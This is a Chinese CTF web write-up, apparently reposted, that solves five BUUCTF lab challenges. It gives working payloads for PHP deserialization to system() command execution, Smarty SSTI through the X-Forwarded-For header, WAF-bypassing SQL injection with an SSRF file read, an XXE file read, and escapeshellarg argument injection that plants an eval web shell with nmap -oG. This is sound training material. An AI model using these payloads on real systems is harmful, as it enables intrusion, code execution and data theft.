渗透测试练习题解析 3(CTF web)

news2025/1/21 1:04:05

1、[网鼎杯 2020 朱雀组]phpweb 1

考点:反序列化漏洞利用

进入靶场,查看检查信息,发现存在两个参数 func 和 p

查看页面源代码

payload:func=file_get_contents&p=php://filter/resource=index.php

整理后,就是 PHP 代码审计了

   <?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");//过滤命令执行的关键字
    function gettime($func, $p) {
        $result = call_user_func($func, $p);//这里由于使用了call_user_func,这个函数是突破口
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        //过滤
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

gettime 中使用了 call_user_func() 函数

也就是说 $func 会被当成回调函数来执行,而 $p 则当做 $func 的参数

Test 类中存在魔术方法 __destruct(),在到某个对象的所有引用都被删除或者当对象被显式销毁时执行的魔术方法。(new 和 unserialize  触发

因为该方法会在类被销毁时调用,所以我们反序列化一个类,在类里面的参数中写上我们要执行的代码和函数,这样的话就会直接调用 gettime 函数,不会执行 in_array($func,$disable_fun) ,从而绕过黑名单。

不了解序列化和反序列化的先看下面的文章

反序列化漏洞详解-CSDN博客

序列化与反序列化介绍_序列化和反序列化-CSDN博客

接下来就是解题思路了

我们还不知道 flag 有关的文件在哪,所以需要查看目录,利用 call_user_func() 函数的特性,我们给第一个参数传递系统命令:system;第二个参数传递:ls,来查看目录,然后为了绕过黑名单,我们需要先把 system("ls") 序列化一下

<?php
    function gettime($func,$p){
        $result = call_user_func($func,$p);
        $a = gettype($result);
        if($a == "string"){
            return $result;
        }else{ return " "; }
    }
    class Test{
        var $func = "system";
        var $p = "ls";
        function __destruct(){
            if($this->func != " "){
                echo gettime($this->func,$this->p);
            }
        }
    }

    $a = new Test();
    echo serialize($a);
?>

O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:2:"ls";}

把序列化后的字符串当做 $p 的值传给 $func ,$func 则传一个反序列化函数

payload:func=unserialize=&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:2:"ls";}

发现回显了一些文件,但是并没有与 flag 有的文件,我们可以尝用命令去目录中搜索相关的文件名

payload:func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:18:"find / -name flag*";}

提交后会有些慢,因为要扫描目录,等待就好了

大家可以用 burp ,那样得到的数据是清晰的,这样子的数据太混乱了,不方便阅读,由上图所示,猜测 /tmp/flagoefiu4r93 里面就有我们的 flag,接下来对该文件进行读取。

class Test{
        var $func = "system";
        var $p = "cat /tmp/flagoefiu4r93";
        function __destruct(){
            if($this->func != " "){
                echo gettime($this->func,$this->p);
            }
        }
    }

payload:func=unserialize&p=O:4:"Test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}

flag{29c9b107-32ff-446b-8474-e4121e71b421}

2、[BJDCTF2020]The mystery of ip 1

考点:SSTI 模版注入

看到 IP 地址,联想到 X-Forwarded-For,构造 XFF ,发现回显的是我们构造的 IP 地址

实际上,不管我们输入什么都会回显给我们,猜测是 SSTI 模版注入,猜测是模版注入后我们可以用 {{ 命令 }} 的方式来注入

接下来就入住命令来获取关键信息

构造payload

X-Forwarded-For:{{system("ls")}}

发现 flag.php 我们查看一下,发现并没有出现 flag,我们再查看一下根目录

X-Forwarded-For:{{system("ls /")}}

出现了 flag,查看一下

{{system("cat /flag")}}

另一种方式,实际上也是注入命令,不过表达的方式不太一样。先查看一下是什么类型的模版

PHP常见的模板:twig,smarty,blade

X-Forwarded-For:{{(config}}

发现是 smarty 模版

Smarty自学笔记_smarty html原样输出-CSDN博客

查看目录

{if system(“ls”)}{/if}

这里的flag.php是假的,要查根目录下的

{if system(“ls /”)}{/if}

获取 flag

X-Forwarded-For:{if system("cat /flag")}{/if}

3、[网鼎杯 2018]Fakebook 1

考点:序列化和反序列化 + SSRF + SQL 注入 + base64 编码

进入页面,没发现可疑的地方,也不存在 SQL 注入,注册个账户看看

点击 admin 进入用户,发现 URL 存在参数,这里可能存在注入点

输入:1 and 1=1 ,页面回显正常

输入:1 and 1=2 ,页面回显异常

说明页面存在 SQL 注入,且为数字型注入

判断列数,4 列的时候正常,5 列的时候异常,说明存在 4 列

先使用联合注入试试看,判断回显位

-1 union select 1,2,3,4

没法用,猜测是某些关键字被过滤了,试了很多绕过都不行,最后看大佬的 wp 才知道存在 WAF,union select 被过滤了 ,使用 /**/ 可以绕过

-1 union/**/select 1,2,3,4

爆破数据库名

爆破表格名

-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

【group_concat(table_name) 和 from information_schema.XXXXXXXX 是可以分开写的,因为 group_concat() 是独立的,回显点在哪 group_concat() 就放在哪】

举个例子:

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

爆破字段名

-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'

爆破字段内容

其他字段内容都没什么可疑的,只有 data 字段内的内容可疑,我们注册的账号被序列化输出了

-1 union/**/select 1,group_concat(data),3,4 from users

莫名其妙,应该是前面漏了什么步骤,回去看大佬 wp,发现本题还存在源码泄露问题,利用 kali 的后台扫描工具 dirb 进行扫描,发现 robots.txt 这个敏感信息文件

访问后里面的内容记录着一个备份文件 /user.php.bak (.bak 为后缀的为备份文件),访问直接下载

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

代码审计

  • curl_init:初始化一个 curl 会话,供 curl_setopt(),curl_exec() 和 curl_close() 函数使用
  • curl_setopt:请求一个 url,其中 CURLOPT_URL 表示需要获取的 URL 地址,后面就是跟上了它的值
  • CURLOPT_RETURNTRANSFER 将 curl_exec() 获取的信息以文件流的形式返回,而不是直接输出
  • curl_exec,成功时返回 TRUE,或者在失败时返回 FALSE。然而,如果 CURLOPT_RETURNTRANSFER 选项被设置,函数执行成功时会返回执行的结果,失败时返回 FALSE
  • CURLINFO_HTTP_CODE:最后一个收到的 HTTP 代码
  • curl_getinfo:以字符串形式返回它的值,因为设置了 CURLINFO_HTTP_CODE,所以返回的是状态码。如果状态码不是 404,就返回 exec 的结果。

get 函数在 getBlogContents 中被调用

blog 作为参数

由于代码使用正则限制了 blog 的内容,所以只能使用序列化把 blog 注入进去

序列化代码

注意要照葫芦画瓢,类名为 Userinfo ,name 、age和爆破出来的字段内容一样(也就是注册时的内容)

<?php
class Userinfo{
    public $name = "admin";
    public $age = 123;
    public $blog = "file:///var/www/html/flag.php";
}

$a = new Userinfo();
echo serialize($a);
?>

结果

O:8:"Userinfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

构造 payload

-1 union/**/select 1,2,3,'O:8:"Userinfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

这里为什么是注入在 4 的位置?

因为 data 这个表的位置在第 4 列,而根据回显信息可以猜测 data 字段存在漏洞,会对内容进行一次序列化,所以把内容注入到 data 中

查看页面源代码,对该字符串进行 base64 解码

非预期解法

使用 SQL 的 load_file()

payload:no=-1 union/**/select 1,load_file('/var/www/html/flag.php'),3,4

查看源代码直接出结果

下图内容取自:BUUCTF[网鼎杯 2018]Fakebook 1 - LoYoHo00 - 博客园 (cnblogs.com)

4、[NCTF2019]Fake XML cookbook 1

考点:XXE 漏洞

进入靶场

谁便输入看看提示什么

提示登录失败,开始考虑的是 SQL 注入,发现没有注入点,退回去看题目,有 XML 的字样,猜测应该是考察 XXE 漏洞 (XML 外部实体注入漏洞)

不了解该漏洞的看这篇文章

浅谈XML实体注入漏洞 - FreeBuf网络安全行业门户

服务器端漏洞篇之XML外部实体注入(XXE)专题 - FreeBuf网络安全行业门户

懒得看的这里我给大家简单介绍一下

XXE 漏洞产生的原因:

        应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部软件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 DOS 攻击等危害。【XXE 漏洞触发的点往往是可以上传 XML 文件的位置没有对上传的 XML 文件进行过滤,导致可上传恶意 XML 文件】


XML 和 HTML 区别:

XML 被设计为传输和存储数据,其焦点是数据的内容。

HTML 被设计用来显示数据,其焦点是数据的外观。

当然,XXE 也存在隐藏攻击的方式,有些地方可以在没有输入任何 XML 格式的数据的情况下发动 XXE 攻击,例如

  • XInclude 攻击
  • 通过文件上传的 XXE 攻击
  • 通过修改 Content-Type 的 XXE 攻击

1、XInclude 攻击

        有些应用程序的服务端会将从客户端接收的内容嵌入到 XML 文档中然后解析,这就导致因为我们无法控制整个 XML 文档而无法发动常规的 XXE 攻击,但是我们可以通过 XInclude 在该 XML 文档中构建子 XML 文档,想要使用 XInclude 我们需要引入相应的命名空间。(详细看上面第二条链接)

2、通过文件上传的 XXE 攻击

        有的应用程序允许上传 XML 格式的文件,比如 office 文档或 SVG 图像,然后这些文件也会因为在服务端解析而触发 XXE 攻击。

深入简出 SVG 教程 - 知乎 (zhihu.com)

3、通过修改 Content-Type 的 XXE 攻击

        大部分的 POST 请求的 Content-Type 都是表单类型(application/x-www-form-urlencoded),但是有的应用程序允许将其修改成 text/xml,这样我们就可以将报文内容替换成 XML 格式的内容了,如下所示

POST /action HTTP/1.0

Content-Type:text/xml

Content-Length:52

<?xml version="1.0" encoding="UTF-8"?>

<foo>bar</foo>

下面是本题的解题思路

要注意这里,加 &  、;  前面就是没注意到这点一直做不出来

payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY adm SYSTEM "file:///flag">
  ]>
<user><username>&adm;</username><password>123456</password></user>

5、[BUUCTF 2018]Online Tool 1

考点:escapeshellarg () 和 escapeshellcmd () 漏洞 + nmap 文件写入的利用

进入靶场,代码审计

分析代码

PHP 中 $_SERVER 参数 HTTP_X_FORWARDED_FORREMOTE_ADDR

在 PHP 中使用 $_SERVER["REMOTE_ADDR"] 来获取客户端的 IP 地址,如果客户端使用代理服务器来访问,那取到的就是代理服务器的 IP 地址,而不是真正的客户端 IP 地址。若想透过代理服务器获取客户端的真实 IP 地址,就要使用 $_SERVER["HTTP_X_FORWARDED_FOR"] 来获取。

【当然了,并不是每个代理服务器都能用 $_SERVER["HTTP_X_FORWARDED_FOR"] 来读取客户端的真实 IP,有些用此方法读取到的仍然是代理服务器的 IP】

(如果客户端通过代理服务器,则取 HTTP_X_FORWARDED_FOR 的值,如果没通过代理服务器,就取 REMOTE_ADDR 的值)

escapeshellarg:把字符串转码为可以在 shell 命令里使用的参数。

escapeshellarg 在 CTF 中的利用:

  • 参数注入(开发人员错误的使用 escapeshellarg 函数)
  • 逃逸字符串(该函数非二进制安全)

escapeshellcmd:shell 元字符转义

(escapeshellarg 和 escapeshellcmd 相似,主要看是否有引号)

PHP chdir () 函数:

它将 PHP 的当前目录更改为传递的目录。

<?php
    echo getcwd() . "\n";
    
    chdir('html');

    echo getcwd() . "\n";
?>

/*
输出结果:
/home/tutorialspoint
/home/tutorialspoint/html/
*/

PHP mkdir () 函数:用来创建目录

代码整体功能:

1、首先判断客户端提供给服务器和服务器自动获取的 IP 是否一致。

2、判断 get host 参数的传值,没有传值调用 highlight_file(__FILE__)。

3 、传值,host 传递参数经过 escapeshellarg、escapeshellcmd 函数的限制。

4、以 ‘glzjin’ + IP 通过 md5 加密,结果作为文件名创建文件。调用 chdir ()  函数,当前文件地址更改为创建的文件

5、输出 system 执行结果

解题思路

escapeshellarg 处理后先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。

举例:

192.168.1.100' -oG 经过 escapeshellarg 处理后就变成 ' 192.168.1.100 ' \' ' -oG ' 以被转义的单引号为中心左右被分成两部分并且加上单引号。

随后再进过 escapeshellcmd 时变成:' 192.168.1.100 ' \\ ' ' -oG \' 【会发现将不成对的单引号及 \ 符号再次添加 \ 】前面被转义的单引号被认为是和 -oG 左边单引号成对的,导致 -oG 右边的单引号被认为是不成对的单引号,因此被转义。

这位博主写的很详细【[BUUCTF 2018]Online Tool - My_Dreams - 博客园 (cnblogs.com)】

代码的本意是要我们输入 IP 这样的参数做一个扫描,通过前面说的那两个函数来进行规则过滤,我们的输入会被单引号括起来,但是因为前面我们所描述的漏洞告诉我们可以逃脱引号的束缚

-oG 是 nmap 的一个参数,可以实现将命令和结果写到文件

正是因为 nmap 存在 -oG 这个参数,所以我们可以控制自己的输入写入到文件,配合一句话木马来使用。当然也可以使用命令 cat /flag

方法一:一句话木马

?host=' <?php @eval($_POST["123"]);?> -oG hack.php '

构造完 payload 回车后,页面会显示文件名

使用蚁剑进行连接

fcbaaa3b-8c9f-46d1-a647-3790cd66ccb3.node5.buuoj.cn:81/2776a2b4045f0b6fecd14c61ea2a61b0/hack.php

提示

hack.php 文件名自定义,后缀是 .php 就好

方法二:直接使用命令

?host=' <?php echo `cat /flag`;?> -oG abc.php '

注意:

  • cat /flag 用反引号括起来;
  • 单引号和 < > 之间需要有空格

把路径拼接好即可

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1446994.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

操作系统——1.3 操作系统运行环境

1.3 操作系统运行环境 一、概念 操作系统运行机制总览 应用程序与内核程序 特权指令与非特权指令 内核态与用户态 CPU在内核态与用户态的切换 操作系统运行机制的总结 中断和异常总览 中断的作用 中断的类型 内中断的例子 外中断的例子 中断的分类&am…

腾讯云4核8G服务器多少钱?轻量和CVM报价2024新版

腾讯云4核8G服务器S5和轻量应用服务器优惠价格表&#xff0c;轻量应用服务器和CVM云服务器均有活动&#xff0c;云服务器CVM标准型S5实例4核8G配置价格15个月1437.3元&#xff0c;5年6490.44元&#xff0c;标准型SA2服务器1444.8元一年&#xff0c;轻量应用服务器4核8G12M带宽一…

漫漫数学之旅018

文章目录 经典格言数学习题古今评注名人小传 - 库尔特哥德尔 经典格言 一个毫无自由的社会——一个人凡事都要遵循严格统一的规则——将在行为上既不一致也不完全&#xff0c;甚至不能解决某些也许很重要的问题。——库尔特哥德尔&#xff08;Kurt Gdel&#xff09; 库尔特哥德…

机器学习:卷积介绍及代码实现卷积操作

传统卷积运算是将卷积核以滑动窗口的方式在输入图上滑动&#xff0c;当前窗口内对应元素相乘然后求和得到结果&#xff0c;一个窗口一个结果。相乘然后求和恰好也是向量内积的计算方式&#xff0c;所以可以将每个窗口内的元素拉成向量&#xff0c;通过向量内积进行运算&#xf…

C++ 音视频原理

本篇文章我们来描述一下音视频原理 音视频录制原理: 下面是对这张思维导图的介绍 摄像头部分: 麦克风采集声音 摄像头采集画面 摄像头采集回来的数据可以用RGB也可以用YUV来表示 图像帧帧率 一秒能处理多少张图像 图像处理 &#xff1a;调亮度 图像帧队列 :意思是将数据取…

算法刷题:盛水最多的容器

盛水最多的容器 .习题链接题目题目解析算法原理我的答案 . 习题链接 盛水最多的容器 题目 题目解析 VH*W h为左右两边低的一边,w为左右两边之间的距离 算法原理 定义两个指针 left0,rightn-1; left从左往右对数组进行遍历,right从右往左进行遍历 遍历的过程中,每一次都需要…

10块钱的AI数字人!

&#x1f525;10元的小报童写‬出了500元的‬价值&#xff01; 所以就爆了&#x1f525;&#xff01; 不到两天‬就冲到‬了近3000人&#xff01; 太恐怖了&#xff0c;大佬的微‬信都被加‬爆了&#xff0c; 10块钱还配套‬了一个‬群 就是这‬么牛逼&#xff01; 可能‬…

有状态DHCPv6快速模式配置及EUI-64介绍

正文共&#xff1a;1024 字 15 图&#xff0c;预估阅读时间&#xff1a;3 分钟 我们现在已经熟悉了IPv6的地址架构&#xff08;IPv6地址架构一本通&#xff09;&#xff0c;掌握了IPv6地址的手工配置方式&#xff08;IPv6从入门到精通&#xff09;和DHCPv6有状态地址配置&#…

svg基础(八)滤镜-feTurbulence(湍流)

feTurbulence&#xff1a;湍流滤镜 湍流滤镜&#xff0c;不稳定气流&#xff0c;能够实现半透明的烟熏或波状图像。 通常用于实现一些特殊的纹理。滤镜利用 Perlin 噪声函数创建了一个图像。噪声在模拟云雾效果时非常有用&#xff0c;能产生非常复杂的质感&#xff0c;利用它可…

算法-----高精度算法1(高精度加法,高精度减法)(详解)

什么是高精度算法&#xff1f; 高精度的意思就是他得名字----高的精度&#xff0c;简单说就是位数很大&#xff0c;而高精度算法就是将这些高精度数&#xff08;位数很大在几百几千几万位的数叫高精度数&#xff09;通过计算机的型式模拟出来结果。 为什么要用高精度算法&…

【运维测试】移动测试自动化知识总结第1篇:移动端测试介绍(md文档已分享)

本系列文章md笔记&#xff08;已分享&#xff09;主要讨论移动测试相关知识。主要知识点包括&#xff1a;移动测试分类及android环境搭建&#xff0c;adb常用命令&#xff0c;appium环境搭建及使用&#xff0c;pytest框架学习&#xff0c;PO模式&#xff0c;数据驱动&#xff0…

力扣精选算法100道——【模板】前缀和(一维)

【模板】前缀和_牛客题霸_牛客网 (nowcoder.com) 目录 &#x1f6a9;了解题意 &#x1f6a9;算法原理 &#x1f388;设定下标为1开始 &#x1f388;取值的范围 &#x1f6a9;实现代码 &#x1f6a9;了解题意 第一行的3和2&#xff0c;3代表行数&#xff0c;2代表q次查询(…

Codeforces Round 303 (Div. 2)C. Kefa and Park(DFS、实现)

文章目录 题面链接题意题解代码总结 题面 链接 C. Kefa and Park 题意 求叶节点数量&#xff0c;叶节点满足&#xff0c;从根节点到叶节点的路径上最长连续1的长度小于m 题解 这道题目主要是实现&#xff0c;当不满足条件时直接返回。 到达叶节点后统计答案&#xff0c;用…

结构体,位段问题

结构体&#xff0c;位段问题 一、结构体二、结构体内存分配问题三、存在内存对齐的原因四、结构体传参问题五、结构体实现位段 一、结构体 1.简单说说结构体是什么?  结构体就是把不同的数据类型整合到一起,组成的一个数据类型!!  2.结构体的创建和初始化 struct Stu {char…

【复现】Supabase后端服务 SQL注入漏洞_48

目录 一.概述 二 .漏洞影响 三.漏洞复现 1. 漏洞一&#xff1a; 四.修复建议&#xff1a; 五. 搜索语法&#xff1a; 六.免责声明 一.概述 Supabase是什么 Supabase将自己定位为Firebase的开源替代品&#xff0c;提供了一套工具来帮助开发者构建web或移动应用程序。 Sup…

【MySQL探索之旅】MySQL数据库下载及安装教程

&#x1f4da;博客主页&#xff1a;爱敲代码的小杨. ✨专栏&#xff1a;《Java SE语法》 | 《数据结构与算法》 | 《C生万物》 ❤️感谢大家点赞&#x1f44d;&#x1f3fb;收藏⭐评论✍&#x1f3fb;&#xff0c;您的三连就是我持续更新的动力❤️ &#x1f64f;小杨水平有…

1921:【02NOIP普及组】过河卒

1921&#xff1a;【02NOIP普及组】过河卒 【题目描述】 如图&#xff0c;A点有一个过河卒&#xff0c;需要走到目标B点。卒行走的规则&#xff1a;可以向下、或者向右。 同时在棋盘上的任一点有一个对方的马&#xff08;如上图的C点&#xff09;&#xff0c;该马所在的点和所有…

leetcode(双指针)11.盛最多水的容器(C++详细解释)DAY9

文章目录 1.题目示例提示 2.解答思路3.实现代码结果 4.总结 1.题目 给定一个长度为 n 的整数数组 height 。有 n 条垂线&#xff0c;第 i 条线的两个端点是 (i, 0) 和 (i, height[i]) 。 找出其中的两条线&#xff0c;使得它们与 x 轴共同构成的容器可以容纳最多的水。 返回…

CTFshow web(php命令执行 68-71)

web68 还是那句话&#xff0c;没看到flag在哪&#xff0c;那就优先找到flag位置 这里cvar_dump(scandir("/")); 直接输出根目录的位置&#xff0c;然后查看源代码&#xff0c;发现flag位置为flag.txt 知道flag在根目录下面的flag.txt直接访问就好了 cinclude(/flag…

【C++ 02】类和对象 1:初识类和对象

文章目录 &#x1f308; Ⅰ 面向对象介绍&#x1f308; Ⅱ 类的引入&#x1f308; Ⅲ 类的定义格式1. 声明和定义不分离2. 声明和定义分离 &#x1f308; Ⅳ 类的访问限定符&#x1f308; Ⅴ 类的作用域&#x1f308; Ⅵ 类的实例化&#x1f308; Ⅶ this 指针 &#x1f308; Ⅰ…